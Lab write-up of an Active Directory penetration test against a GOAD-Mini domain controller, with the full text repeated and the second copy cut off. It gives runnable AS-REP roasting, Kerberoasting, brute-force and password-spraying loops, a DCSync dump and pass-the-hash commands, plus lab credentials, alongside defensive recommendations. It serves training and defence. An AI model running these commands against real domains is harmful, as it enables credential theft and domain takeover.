<b># Active Directory Penetration Testing — Complete Notes
### Based on GOAD-Mini Lab Assessment
---
## Table of Contents
1. [Lab Environment](#lab-environment)
2. [Methodology Overview](#methodology-overview)
3. [Tools Used](#tools-used)
4. [Phase 1 — Reconnaissance & Network Discovery](#phase-1--reconnaissance--network-discovery)
5. [Phase 2 — Service Enumeration (SMB)](#phase-2--service-enumeration-smb)
6. [Phase 3 — User Enumeration](#phase-3--user-enumeration)
7. [Phase 4 — Password Discovery & Credential Acquisition](#phase-4--password-discovery--credential-acquisition)
8. [Phase 4.5 — Authenticated AD Enumeration](#phase-45--authenticated-ad-enumeration)
9. [Phase 5 — Advanced Exploitation](#phase-5--advanced-exploitation)
10. [Vulnerabilities Found](#vulnerabilities-found)
11. [Defensive Recommendations](#defensive-recommendations)
12. [Key Takeaways](#key-takeaways)
---
## Lab Environment
| Component | Detail |
|---|---|
| Hostname | KINGSLANDING |
| Domain | SEVENKINGDOMS / sevenkingdoms.local |
| Domain SID | S-1-5-21-3262952663-1425775882-330886615 |
| IP Address | 192.168.56.10 |
| OS | Windows Server 2019 |
| Role | Domain Controller (AD DS + DNS) |
| Attacker OS | Linux (Kali/Debian) |
| Network | Host-only (192.168.56.0/24) |
---
## Methodology Overview
```
1. Reconnaissance → Network discovery, port scanning
2. Enumeration → SMB, LDAP, user & group discovery
3. Credential Discovery → Password attacks, reuse testing
4. Exploitation → AS-REP Roasting, Kerberoasting, DCSync
5. Post-Exploitation → Lateral movement preparation
```
---
## Tools Used
| Category | Tools |
|---|---|
| Network Scanning | Nmap, Nmap NSE scripts |
| SMB Enumeration | Enum4linux, Enum4linux-ng, rpcclient, smbclient |
| LDAP Enumeration | ldapsearch, ldapdomaindump |
| Kerberos Attacks | Kerbrute, Impacket GetNPUsers, GetUserSPNs |
| Password Cracking | hashcat (modes 18200, 13100) |
| Brute Force | Hydra (limited), custom bash scripts, CrackMapExec/NetExec |
| Exploitation | Impacket secretsdump |
| Post-Exploit | crackmapexec, rpcclient |
---
## Phase 1 — Reconnaissance & Network Discovery
### Command
```bash
nmap -sV -sC -p- --min-rate 1000 192.168.56.10
```
### Key Findings
- **14 open ports** — confirmed full AD domain controller
- **Standard AD ports** all open (Kerberos 88, LDAP 389, SMB 445, etc.)
- **Port 80 (HTTP)** open — extra attack surface
- **WinRM ports 5985/5986** open — remote management accessible
- **Both LDAP (389) and LDAPS (636)** available, plus Global Catalog (3268/3269)
### Domain Info Revealed by Nmap
```
Domain: sevenkingdoms.local
Site: Default-First-Site-Name
Hostname: kingslanding.sevenkingdoms.local
```
### SSL Certificate (from LDAPS scan)
```
Subject: commonName=kingslanding.sevenkingdoms.local
Valid From: 2026-01-24
Valid To: 2027-01-24
SAN: DNS:kingslanding.sevenkingdoms.local
```
---
## Phase 2 — Service Enumeration (SMB)
### Enum4linux
```bash
enum4linux -a 192.168.56.10
```
**Findings:**
- Domain: SEVENKINGDOMS
- NetBIOS Name: KINGSLANDING
- MAC: 08:00:27:cd:d4:fb (VirtualBox NIC)
- ⚠️ **Anonymous sessions: ALLOWED** (username '', password '')
- ✅ SMB signing: Enabled and Required (protects against MITM/relay attacks)
### Enum4linux-ng (Advanced)
```bash
enum4linux-ng -A -oJ enum4linux-ng.json 192.168.56.10
```
Provides: share enumeration, user/group enum, password policy info.
### Nmap SMB Scripts
```bash
nmap --script=smb* 192.168.56.10
```
Key scripts: `smb-enum-shares`, `smb-enum-users`, `smb-os-discovery`, `smb-security-mode`, `smb-vuln-*`
> ✅ **SMB signing confirmed required** — good security control, prevents relay attacks.
> ⚠️ **Anonymous sessions allowed** — information disclosure risk.
---
## Phase 3 — User Enumeration
### Technique 1: Kerbrute (Most Effective)
```bash
kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local userlist.txt
```
**How it works:**
- Valid username → `KDC_ERR_PREAUTH_REQUIRED` (user exists, needs password)
- Invalid username → `KDC_ERR_C_PRINCIPAL_UNKNOWN` (not found)
**Advantages:** Fast, no auth needed, low detection risk, bypasses anonymous restrictions.
---
### Technique 2: AS-REP Roasting for User Discovery
```bash
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 -usersfile userlist.txt -format hashcat
```
**Dual benefit:** Discovers valid usernames AND identifies vulnerable accounts simultaneously.
**Output messages explained:**
| Message | Meaning |
|---|---|
| `UF_DONT_REQUIRE_PREAUTH not set` | User exists but pre-auth is ON — not roastable |
| `KDC_ERR_C_PRINCIPAL_UNKNOWN` | Username doesn't exist |
| `KDC_ERR_CLIENT_REVOKED` | Account disabled/locked |
| `$krb5asrep$23$user@DOMAIN:...` | ✅ Hash captured — account is AS-REP roastable! |
---
### Technique 3: SMB/RPC Enumeration
```bash
enum4linux -U 192.168.56.10
rpcclient -U "" -N 192.168.56.10 → enumdomusers
```
Less reliable; often needs authentication.
### Technique 4: LDAP Anonymous Query
```bash
ldapsearch -x -H "ldap://192.168.56.10" -b "DC=sevenkingdoms,DC=local" "(objectClass=user)" sAMAccountName
```
Typically fails on properly configured AD (auth required — and in this lab it was blocked ✅).
---
### Discovered Users (27 total)
| Account | Type | Notes |
|---|---|---|
| Administrator | Admin | High-value target |
| TestAdmin | Admin | Test account |
| DCSyncUser | Privileged | High-value target |
| krbtgt | System | Critical — used in Golden Ticket attacks |
| KINGSLANDING$ | Computer | DC computer account |
| ASREPUser1 | Test | Pre-auth DISABLED — roastable |
| ASREPUser2 | Test | Pre-auth DISABLED — roastable |
| SprayUser1, SprayUser2 | Test | Intended for spray testing |
| TestUser | Test | Pre-auth disabled; Password: `Password123!` |
| ExchangeService | Service | Has SPN — Kerberoastable |
| FileService | Service | Has SPN — Kerberoastable |
| SQLService | Service | Has SPN — Kerberoastable |
| WebService | Service | Has SPN — Kerberoastable |
| cersei.lannister, jaime.lannister, joffrey.baratheon, etc. | Users | GoT-themed GOAD accounts |
| Guest | Built-in | Usually disabled |
| vagrant | Lab | Vagrant deployment account |
---
## Phase 4 — Password Discovery & Credential Acquisition
### Step 1: AS-REP Roasting (No Auth Needed)
```bash
# Get hashes
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 \
-usersfile userlist.txt -format hashcat -outputfile asrep_hashes.txt
# Crack hashes (mode 18200)
hashcat -m 18200 -a 0 asrep_hashes.txt ./passlist.txt
```
**Cracked:**
- `TestUser:Password123!`
- `ASREPUser1:Password123!`
- `ASREPUser2:Password123!`
---
### Step 2: Kerberoasting (Needs 1 Valid Account)
```bash
# Request service tickets
GetUserSPNs.py -dc-ip 192.168.56.10 \
sevenkingdoms.local/TestUser:Password123! \
-request -outputfile kerberoast_hashes.txt
# Crack hashes (mode 13100)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
```
**Targets:** ExchangeService, FileService, SQLService, WebService (all had SPNs)
**Result:** All cracked with `Password123!`
---
### Step 3: SMB Brute Force
#### Why Hydra/Medusa FAIL on modern Windows Server 2019:
- SMB signing required — these tools don't handle it
- SMB 1.0/2.0 only — Server 2019 uses SMB 3.x
- Auth handshake mismatches
#### Working approach — custom bash script:
```bash
for user in $(cat users.txt); do
for password in $(cat passlist.txt); do
smbclient -L 192.168.56.10 -U "$user%$password" -N >/dev/null 2>&1
if [ $? -eq 0 ]; then
echo "VALID: $user:$password" >> valid_credentials.txt
fi
done
done
```
#### CrackMapExec / NetExec (Recommended):
```bash
crackmapexec smb 192.168.56.10 -u users.txt -p passwords.txt --continue-on-success
# OR newer:
netexec smb 192.168.56.10 -u users.txt -p passwords.txt --continue-on-success
```
Better lockout detection, faster, modern SMB support.
---
### Step 4: Password Spraying (Low Lockout Risk)
```bash
for password in $(cat spray_passwords.txt); do
for user in $(cat users.txt); do
smbclient -L 192.168.56.10 -U "$user%$password" -N >/dev/null 2>&1
if [ $? -eq 0 ]; then echo "[+] VALID: $user:$password"; fi
sleep 2 # avoid lockouts
done
done
```
---
### Account Lockout Awareness
| Setting | Windows Default |
|---|---|
| Lockout threshold | 5 failed attempts |
| Lockout duration | 30 minutes |
| Counter reset | 30 minutes |
**Best practices:**
- Use `sleep 2` between attempts
- Use password spraying (few passwords × many users) over brute force
- Monitor for lockout error messages
- Prioritize service accounts first, avoid Administrator initially
---
### Credential Discovery Results
| Account | Password | How Found |
|---|---|---|
| TestUser | Password123! | AS-REP Roasting |
| ASREPUser1 | Password123! | AS-REP Roasting |
| ASREPUser2 | Password123! | AS-REP Roasting |
| ExchangeService | Password123! | Kerberoasting |
| FileService | Password123! | Kerberoasting |
| SQLService | Password123! | Kerberoasting |
| WebService | Password123! | Kerberoasting |
| **Administrator** | **8dCT-DJjgScp** | **Dictionary brute force** |
---
### Password Reuse Testing
```bash
found_password="8dCT-DJjgScp"
for user in $(cat users.txt); do
smbclient -L 192.168.56.10 -U "$user%$found_password" -N >/dev/null 2>&1
if [ $? -eq 0 ]; then echo "REUSE: $user:$found_password"; fi
done
```
---
## Phase 4.5 — Authenticated AD Enumeration
Once `Administrator:8dCT-DJjgScp` was obtained, full authenticated enumeration was performed.
### LDAP Queries
#### Users:
```bash
ldapsearch -x -H "ldap://192.168.56.10" \
-D "Administrator@sevenkingdoms.local" -w "8dCT-DJjgScp" \
-b "DC=sevenkingdoms,DC=local" "(objectClass=user)" \
sAMAccountName userPrincipalName description
```
#### Groups:
```bash
ldapsearch ... "(objectClass=group)" cn member memberOf
```
#### Computers:
```bash
ldapsearch ... "(objectClass=computer)" name operatingSystem lastLogon
```
#### OUs:
```bash
ldapsearch ... "(objectClass=organizationalUnit)" ou description
```
### Full Domain Dump
```bash
ldapdomaindump -u "SEVENKINGDOMS\\Administrator" -p "8dCT-DJjgScp" \
192.168.56.10 -o ldap_dump/
```
**Output files:** `domain_users.json`, `domain_groups.json`, `domain_computers.json`, `domain_ous.json`, `domain_policy.json`
---
## Phase 5 — Advanced Exploitation
### DCSync Attack
```bash
secretsdump.py -dc-ip 192.168.56.10 \
sevenkingdoms.local/Administrator:8dCT-DJjgScp@192.168.56.10 \
-just-dc
```
**What it extracts:**
- NTLM hashes for ALL domain accounts
- LM hashes (if enabled)
- Kerberos AES keys
- **krbtgt hash** → enables Golden Ticket attacks
**Why it's catastrophic:** Single command = complete domain credential dump.
**Required permissions for DCSync:**
- Domain Admin, OR
- "Replicating Directory Changes", OR
- "Replicating Directory Changes All" rights
---
### Authenticated SMB Enumeration (Pass-the-Hash)
```bash
crackmapexec smb 192.168.56.10 \
-u Administrator \
-H c66d72021a2d4744409969a581a1705e \
--shares
```
### RPC Enumeration (Authenticated)
```bash
rpcclient -U "Administrator%8dCT-DJjgScp" 192.168.56.10
> enumdomusers
```
---
## Vulnerabilities Found
### Critical
| ID | Finding | Impact |
|---|---|---|
| F-01 | Weak Domain Admin password (`8dCT-DJjgScp`) | Immediate full domain control |
| F-02 | Excessive privileges enabled DCSync | All domain credentials extracted in one operation |
### High
| ID | Finding | Impact |
|---|---|---|
| F-03 | AS-REP Roastable accounts (ASREPUser1, ASREPUser2) | Offline cracking without authentication |
| F-04 | Kerberoastable service accounts with weak passwords | Service account takeover, lateral movement |
### Medium
| ID | Finding | Impact |
|---|---|---|
| F-05 | Partial anonymous SMB sessions allowed | Unauthenticated info gathering |
| F-06 | HTTP (port 80) open on DC | Extra attack surface, potential info leak |
### Positive Controls Observed ✅
| ID | Control | Value |
|---|---|---|
| P-01 | SMB signing required | Prevents relay/MITM attacks |
| P-02 | Anonymous LDAP bind disabled | Prevents unauthenticated directory scraping |
---
## Defensive Recommendations
### Immediate (High Priority)
1. **Eliminate weak/default credentials**
- Reset Administrator and all service accounts
- Use unique passwords — no sharing across accounts
- Store privileged credentials in a vault
2. **Fix Kerberos pre-auth misconfigurations**
- Enable pre-authentication on ALL user accounts
- Audit for `DONT_REQ_PREAUTH` flag regularly
- Alert on changes to this flag
3. **Strengthen password policy**
- Minimum 14+ characters (higher for privileged/service accounts)
- Enforce complexity or use long passphrases
- Enable password history + minimum age
- Implement MFA for administrative access
### Long-Term (Strategic)
4. **Privileged Access Management (PAM)**
- JIT (Just-In-Time) privilege elevation
- Privileged Access Workstations (PAWs)
- Regular access reviews; reduce Domain Admin members
5. **Service Account Hardening**
- Migrate to **gMSA** (Group Managed Service Accounts) — auto-rotating passwords
- Deny interactive logon for service accounts
- Constrain delegation
- Reduce SPN exposure
6. **Reduce DC Attack Surface**
- Remove non-essential services (e.g., no HTTP on DCs)
- Role separation — no extra workloads on DCs
7. **Network Segmentation**
- Isolate DCs from user subnets
- Firewall/ACL for SMB (445), WinRM (5985/5986), LDAP (389/636), Kerberos (88)
8. **LAPS — Local Admin Password Solution**
- Randomize local admin passwords per machine
- Prevent lateral movement via password reuse
### Monitoring & Detection
9. **Enable Advanced Auditing** for:
- Account Logon (success + failure)
- Logon/Logoff (success + failure)
- Account Management
- Directory Service Access
- Privilege Use
- Policy Change
10. **Alert on these AD attack patterns:**
- Unusual Kerberos auth failures (enumeration/spraying)
- Spike in TGS requests to SPNs → Kerberoasting
- DC replication operations from non-DC hosts → DCSync
- Excessive failed logons across many users → password spray
- Privileged group membership changes
- Unexpected admin logons
11. **Protected Users Group** — add high-value accounts to prevent credential caching, Kerberos delegation abuse, etc.
---
## Key Takeaways
### Attack Side
- **Enumeration is decisive** — thorough recon directly enables all downstream attacks
- **One weak privileged credential collapses the entire domain** — even with good controls elsewhere
- **Service accounts are high-value targets** — SPNs + weak passwords = easy offline cracking
- **Password reuse is a force multiplier** — one cracked password can open many accounts
- **AS-REP Roasting is free** — no credentials needed, purely passive from the network
### Defense Side
- **Network controls alone are not enough** — credential hygiene is non-negotiable
- **Many AD attacks are detectable** — proper auditing + centralized logging + alerting
- **Least privilege matters** — smaller blast radius if one account is compromised
- **gMSA for service accounts** — removes the human password hygiene problem entirely
- **Clock sync (NTP) is critical for Kerberos** — drift > 5 min causes `KRB_AP_ERR_SKEW` and breaks auth
---
## Quick Reference: Hash Cracking Modes
| Attack | Hash Prefix | Hashcat Mode |
|---|---|---|
| AS-REP Roasting | `$krb5asrep$23$` | 18200 |
| Kerberoasting | `$krb5tgs$23$` | 13100 |
| NTLM | (no prefix) | 1000 |
---
## Quick Reference: Key Commands
```bash
# Kerbrute user enum
kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local userlist.txt
# AS-REP Roasting
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 -usersfile users.txt -format hashcat -outputfile asrep.txt
# Kerberoasting
GetUserSPNs.py -dc-ip 192.168.56.10 sevenkingdoms.local/user:pass -request -outputfile kerb.txt
# Full domain dump
ldapdomaindump -u "DOMAIN\\user" -p "pass" 192.168.56.10 -o ldap_dump/
# DCSync
secretsdump.py -dc-ip 192.168.56.10 sevenkingdoms.local/Administrator:pass@192.168.56.10 -just-dc
# Crack AS-REP
hashcat -m 18200 -a 0 asrep.txt wordlist.txt
# Crack Kerberoast
hashcat -m 13100 kerb.txt wordlist.txt
```</b>
### Based on GOAD-Mini Lab Assessment
---
## Table of Contents
1. [Lab Environment](#lab-environment)
2. [Methodology Overview](#methodology-overview)
3. [Tools Used](#tools-used)
4. [Phase 1 — Reconnaissance & Network Discovery](#phase-1--reconnaissance--network-discovery)
5. [Phase 2 — Service Enumeration (SMB)](#phase-2--service-enumeration-smb)
6. [Phase 3 — User Enumeration](#phase-3--user-enumeration)
7. [Phase 4 — Password Discovery & Credential Acquisition](#phase-4--password-discovery--credential-acquisition)
8. [Phase 4.5 — Authenticated AD Enumeration](#phase-45--authenticated-ad-enumeration)
9. [Phase 5 — Advanced Exploitation](#phase-5--advanced-exploitation)
10. [Vulnerabilities Found](#vulnerabilities-found)
11. [Defensive Recommendations](#defensive-recommendations)
12. [Key Takeaways](#key-takeaways)
---
## Lab Environment
| Component | Detail |
|---|---|
| Hostname | KINGSLANDING |
| Domain | SEVENKINGDOMS / sevenkingdoms.local |
| Domain SID | S-1-5-21-3262952663-1425775882-330886615 |
| IP Address | 192.168.56.10 |
| OS | Windows Server 2019 |
| Role | Domain Controller (AD DS + DNS) |
| Attacker OS | Linux (Kali/Debian) |
| Network | Host-only (192.168.56.0/24) |
---
## Methodology Overview
```
1. Reconnaissance → Network discovery, port scanning
2. Enumeration → SMB, LDAP, user & group discovery
3. Credential Discovery → Password attacks, reuse testing
4. Exploitation → AS-REP Roasting, Kerberoasting, DCSync
5. Post-Exploitation → Lateral movement preparation
```
---
## Tools Used
| Category | Tools |
|---|---|
| Network Scanning | Nmap, Nmap NSE scripts |
| SMB Enumeration | Enum4linux, Enum4linux-ng, rpcclient, smbclient |
| LDAP Enumeration | ldapsearch, ldapdomaindump |
| Kerberos Attacks | Kerbrute, Impacket GetNPUsers, GetUserSPNs |
| Password Cracking | hashcat (modes 18200, 13100) |
| Brute Force | Hydra (limited), custom bash scripts, CrackMapExec/NetExec |
| Exploitation | Impacket secretsdump |
| Post-Exploit | crackmapexec, rpcclient |
---
## Phase 1 — Reconnaissance & Network Discovery
### Command
```bash
nmap -sV -sC -p- --min-rate 1000 192.168.56.10
```
### Key Findings
- **14 open ports** — confirmed full AD domain controller
- **Standard AD ports** all open (Kerberos 88, LDAP 389, SMB 445, etc.)
- **Port 80 (HTTP)** open — extra attack surface
- **WinRM ports 5985/5986** open — remote management accessible
- **Both LDAP (389) and LDAPS (636)** available, plus Global Catalog (3268/3269)
### Domain Info Revealed by Nmap
```
Domain: sevenkingdoms.local
Site: Default-First-Site-Name
Hostname: kingslanding.sevenkingdoms.local
```
### SSL Certificate (from LDAPS scan)
```
Subject: commonName=kingslanding.sevenkingdoms.local
Valid From: 2026-01-24
Valid To: 2027-01-24
SAN: DNS:kingslanding.sevenkingdoms.local
```
---
## Phase 2 — Service Enumeration (SMB)
### Enum4linux
```bash
enum4linux -a 192.168.56.10
```
**Findings:**
- Domain: SEVENKINGDOMS
- NetBIOS Name: KINGSLANDING
- MAC: 08:00:27:cd:d4:fb (VirtualBox NIC)
- ⚠️ **Anonymous sessions: ALLOWED** (username '', password '')
- ✅ SMB signing: Enabled and Required (protects against MITM/relay attacks)
### Enum4linux-ng (Advanced)
```bash
enum4linux-ng -A -oJ enum4linux-ng.json 192.168.56.10
```
Provides: share enumeration, user/group enum, password policy info.
### Nmap SMB Scripts
```bash
nmap --script=smb* 192.168.56.10
```
Key scripts: `smb-enum-shares`, `smb-enum-users`, `smb-os-discovery`, `smb-security-mode`, `smb-vuln-*`
> ✅ **SMB signing confirmed required** — good security control, prevents relay attacks.
> ⚠️ **Anonymous sessions allowed** — information disclosure risk.
---
## Phase 3 — User Enumeration
### Technique 1: Kerbrute (Most Effective)
```bash
kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local userlist.txt
```
**How it works:**
- Valid username → `KDC_ERR_PREAUTH_REQUIRED` (user exists, needs password)
- Invalid username → `KDC_ERR_C_PRINCIPAL_UNKNOWN` (not found)
**Advantages:** Fast, no auth needed, low detection risk, bypasses anonymous restrictions.
---
### Technique 2: AS-REP Roasting for User Discovery
```bash
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 -usersfile userlist.txt -format hashcat
```
**Dual benefit:** Discovers valid usernames AND identifies vulnerable accounts simultaneously.
**Output messages explained:**
| Message | Meaning |
|---|---|
| `UF_DONT_REQUIRE_PREAUTH not set` | User exists but pre-auth is ON — not roastable |
| `KDC_ERR_C_PRINCIPAL_UNKNOWN` | Username doesn't exist |
| `KDC_ERR_CLIENT_REVOKED` | Account disabled/locked |
| `$krb5asrep$23$user@DOMAIN:...` | ✅ Hash captured — account is AS-REP roastable! |
---
### Technique 3: SMB/RPC Enumeration
```bash
enum4linux -U 192.168.56.10
rpcclient -U "" -N 192.168.56.10 → enumdomusers
```
Less reliable; often needs authentication.
### Technique 4: LDAP Anonymous Query
```bash
ldapsearch -x -H "ldap://192.168.56.10" -b "DC=sevenkingdoms,DC=local" "(objectClass=user)" sAMAccountName
```
Typically fails on properly configured AD (auth required — and in this lab it was blocked ✅).
---
### Discovered Users (27 total)
| Account | Type | Notes |
|---|---|---|
| Administrator | Admin | High-value target |
| TestAdmin | Admin | Test account |
| DCSyncUser | Privileged | High-value target |
| krbtgt | System | Critical — used in Golden Ticket attacks |
| KINGSLANDING$ | Computer | DC computer account |
| ASREPUser1 | Test | Pre-auth DISABLED — roastable |
| ASREPUser2 | Test | Pre-auth DISABLED — roastable |
| SprayUser1, SprayUser2 | Test | Intended for spray testing |
| TestUser | Test | Pre-auth disabled; Password: `Password123!` |
| ExchangeService | Service | Has SPN — Kerberoastable |
| FileService | Service | Has SPN — Kerberoastable |
| SQLService | Service | Has SPN — Kerberoastable |
| WebService | Service | Has SPN — Kerberoastable |
| cersei.lannister, jaime.lannister, joffrey.baratheon, etc. | Users | GoT-themed GOAD accounts |
| Guest | Built-in | Usually disabled |
| vagrant | Lab | Vagrant deployment account |
---
## Phase 4 — Password Discovery & Credential Acquisition
### Step 1: AS-REP Roasting (No Auth Needed)
```bash
# Get hashes
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 \
-usersfile userlist.txt -format hashcat -outputfile asrep_hashes.txt
# Crack hashes (mode 18200)
hashcat -m 18200 -a 0 asrep_hashes.txt ./passlist.txt
```
**Cracked:**
- `TestUser:Password123!`
- `ASREPUser1:Password123!`
- `ASREPUser2:Password123!`
---
### Step 2: Kerberoasting (Needs 1 Valid Account)
```bash
# Request service tickets
GetUserSPNs.py -dc-ip 192.168.56.10 \
sevenkingdoms.local/TestUser:Password123! \
-request -outputfile kerberoast_hashes.txt
# Crack hashes (mode 13100)
hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt --force
```
**Targets:** ExchangeService, FileService, SQLService, WebService (all had SPNs)
**Result:** All cracked with `Password123!`
---
### Step 3: SMB Brute Force
#### Why Hydra/Medusa FAIL on modern Windows Server 2019:
- SMB signing required — these tools don't handle it
- SMB 1.0/2.0 only — Server 2019 uses SMB 3.x
- Auth handshake mismatches
#### Working approach — custom bash script:
```bash
for user in $(cat users.txt); do
for password in $(cat passlist.txt); do
smbclient -L 192.168.56.10 -U "$user%$password" -N >/dev/null 2>&1
if [ $? -eq 0 ]; then
echo "VALID: $user:$password" >> valid_credentials.txt
fi
done
done
```
#### CrackMapExec / NetExec (Recommended):
```bash
crackmapexec smb 192.168.56.10 -u users.txt -p passwords.txt --continue-on-success
# OR newer:
netexec smb 192.168.56.10 -u users.txt -p passwords.txt --continue-on-success
```
Better lockout detection, faster, modern SMB support.
---
### Step 4: Password Spraying (Low Lockout Risk)
```bash
for password in $(cat spray_passwords.txt); do
for user in $(cat users.txt); do
smbclient -L 192.168.56.10 -U "$user%$password" -N >/dev/null 2>&1
if [ $? -eq 0 ]; then echo "[+] VALID: $user:$password"; fi
sleep 2 # avoid lockouts
done
done
```
---
### Account Lockout Awareness
| Setting | Windows Default |
|---|---|
| Lockout threshold | 5 failed attempts |
| Lockout duration | 30 minutes |
| Counter reset | 30 minutes |
**Best practices:**
- Use `sleep 2` between attempts
- Use password spraying (few passwords × many users) over brute force
- Monitor for lockout error messages
- Prioritize service accounts first, avoid Administrator initially
---
### Credential Discovery Results
| Account | Password | How Found |
|---|---|---|
| TestUser | Password123! | AS-REP Roasting |
| ASREPUser1 | Password123! | AS-REP Roasting |
| ASREPUser2 | Password123! | AS-REP Roasting |
| ExchangeService | Password123! | Kerberoasting |
| FileService | Password123! | Kerberoasting |
| SQLService | Password123! | Kerberoasting |
| WebService | Password123! | Kerberoasting |
| **Administrator** | **8dCT-DJjgScp** | **Dictionary brute force** |
---
### Password Reuse Testing
```bash
found_password="8dCT-DJjgScp"
for user in $(cat users.txt); do
smbclient -L 192.168.56.10 -U "$user%$found_password" -N >/dev/null 2>&1
if [ $? -eq 0 ]; then echo "REUSE: $user:$found_password"; fi
done
```
---
## Phase 4.5 — Authenticated AD Enumeration
Once `Administrator:8dCT-DJjgScp` was obtained, full authenticated enumeration was performed.
### LDAP Queries
#### Users:
```bash
ldapsearch -x -H "ldap://192.168.56.10" \
-D "Administrator@sevenkingdoms.local" -w "8dCT-DJjgScp" \
-b "DC=sevenkingdoms,DC=local" "(objectClass=user)" \
sAMAccountName userPrincipalName description
```
#### Groups:
```bash
ldapsearch ... "(objectClass=group)" cn member memberOf
```
#### Computers:
```bash
ldapsearch ... "(objectClass=computer)" name operatingSystem lastLogon
```
#### OUs:
```bash
ldapsearch ... "(objectClass=organizationalUnit)" ou description
```
### Full Domain Dump
```bash
ldapdomaindump -u "SEVENKINGDOMS\\Administrator" -p "8dCT-DJjgScp" \
192.168.56.10 -o ldap_dump/
```
**Output files:** `domain_users.json`, `domain_groups.json`, `domain_computers.json`, `domain_ous.json`, `domain_policy.json`
---
## Phase 5 — Advanced Exploitation
### DCSync Attack
```bash
secretsdump.py -dc-ip 192.168.56.10 \
sevenkingdoms.local/Administrator:8dCT-DJjgScp@192.168.56.10 \
-just-dc
```
**What it extracts:**
- NTLM hashes for ALL domain accounts
- LM hashes (if enabled)
- Kerberos AES keys
- **krbtgt hash** → enables Golden Ticket attacks
**Why it's catastrophic:** Single command = complete domain credential dump.
**Required permissions for DCSync:**
- Domain Admin, OR
- "Replicating Directory Changes", OR
- "Replicating Directory Changes All" rights
---
### Authenticated SMB Enumeration (Pass-the-Hash)
```bash
crackmapexec smb 192.168.56.10 \
-u Administrator \
-H c66d72021a2d4744409969a581a1705e \
--shares
```
### RPC Enumeration (Authenticated)
```bash
rpcclient -U "Administrator%8dCT-DJjgScp" 192.168.56.10
> enumdomusers
```
---
## Vulnerabilities Found
### Critical
| ID | Finding | Impact |
|---|---|---|
| F-01 | Weak Domain Admin password (`8dCT-DJjgScp`) | Immediate full domain control |
| F-02 | Excessive privileges enabled DCSync | All domain credentials extracted in one operation |
### High
| ID | Finding | Impact |
|---|---|---|
| F-03 | AS-REP Roastable accounts (ASREPUser1, ASREPUser2) | Offline cracking without authentication |
| F-04 | Kerberoastable service accounts with weak passwords | Service account takeover, lateral movement |
### Medium
| ID | Finding | Impact |
|---|---|---|
| F-05 | Partial anonymous SMB sessions allowed | Unauthenticated info gathering |
| F-06 | HTTP (port 80) open on DC | Extra attack surface, potential info leak |
### Positive Controls Observed ✅
| ID | Control | Value |
|---|---|---|
| P-01 | SMB signing required | Prevents relay/MITM attacks |
| P-02 | Anonymous LDAP bind disabled | Prevents unauthenticated directory scraping |
---
## Defensive Recommendations
### Immediate (High Priority)
1. **Eliminate weak/default credentials**
- Reset Administrator and all service accounts
- Use unique passwords — no sharing across accounts
- Store privileged credentials in a vault
2. **Fix Kerberos pre-auth misconfigurations**
- Enable pre-authentication on ALL user accounts
- Audit for `DONT_REQ_PREAUTH` flag regularly
- Alert on changes to this flag
3. **Strengthen password policy**
- Minimum 14+ characters (higher for privileged/service accounts)
- Enforce complexity or use long passphrases
- Enable password history + minimum age
- Implement MFA for administrative access
### Long-Term (Strategic)
4. **Privileged Access Management (PAM)**
- JIT (Just-In-Time) privilege elevation
- Privileged Access Workstations (PAWs)
- Regular access reviews; reduce Domain Admin members
5. **Service Account Hardening**
- Migrate to **gMSA** (Group Managed Service Accounts) — auto-rotating passwords
- Deny interactive logon for service accounts
- Constrain delegation
- Reduce SPN exposure
6. **Reduce DC Attack Surface**
- Remove non-essential services (e.g., no HTTP on DCs)
- Role separation — no extra workloads on DCs
7. **Network Segmentation**
- Isolate DCs from user subnets
- Firewall/ACL for SMB (445), WinRM (5985/5986), LDAP (389/636), Kerberos (88)
8. **LAPS — Local Admin Password Solution**
- Randomize local admin passwords per machine
- Prevent lateral movement via password reuse
### Monitoring & Detection
9. **Enable Advanced Auditing** for:
- Account Logon (success + failure)
- Logon/Logoff (success + failure)
- Account Management
- Directory Service Access
- Privilege Use
- Policy Change
10. **Alert on these AD attack patterns:**
- Unusual Kerberos auth failures (enumeration/spraying)
- Spike in TGS requests to SPNs → Kerberoasting
- DC replication operations from non-DC hosts → DCSync
- Excessive failed logons across many users → password spray
- Privileged group membership changes
- Unexpected admin logons
11. **Protected Users Group** — add high-value accounts to prevent credential caching, Kerberos delegation abuse, etc.
---
## Key Takeaways
### Attack Side
- **Enumeration is decisive** — thorough recon directly enables all downstream attacks
- **One weak privileged credential collapses the entire domain** — even with good controls elsewhere
- **Service accounts are high-value targets** — SPNs + weak passwords = easy offline cracking
- **Password reuse is a force multiplier** — one cracked password can open many accounts
- **AS-REP Roasting is free** — no credentials needed, purely passive from the network
### Defense Side
- **Network controls alone are not enough** — credential hygiene is non-negotiable
- **Many AD attacks are detectable** — proper auditing + centralized logging + alerting
- **Least privilege matters** — smaller blast radius if one account is compromised
- **gMSA for service accounts** — removes the human password hygiene problem entirely
- **Clock sync (NTP) is critical for Kerberos** — drift > 5 min causes `KRB_AP_ERR_SKEW` and breaks auth
---
## Quick Reference: Hash Cracking Modes
| Attack | Hash Prefix | Hashcat Mode |
|---|---|---|
| AS-REP Roasting | `$krb5asrep$23$` | 18200 |
| Kerberoasting | `$krb5tgs$23$` | 13100 |
| NTLM | (no prefix) | 1000 |
---
## Quick Reference: Key Commands
```bash
# Kerbrute user enum
kerbrute userenum --dc 192.168.56.10 -d sevenkingdoms.local userlist.txt
# AS-REP Roasting
GetNPUsers.py sevenkingdoms.local/ -dc-ip 192.168.56.10 -usersfile users.txt -format hashcat -outputfile asrep.txt
# Kerberoasting
GetUserSPNs.py -dc-ip 192.168.56.10 sevenkingdoms.local/user:pass -request -outputfile kerb.txt
# Full domain dump
ldapdomaindump -u "DOMAIN\\user" -p "pass" 192.168.56.10 -o ldap_dump/
# DCSync
secretsdump.py -dc-ip 192.168.56.10 sevenkingdoms.local/Administrator:pass@192.168.56.10 -just-dc
# Crack AS-REP
hashcat -m 18200 -a 0 asrep.txt wordlist.txt
# Crack Kerberoast
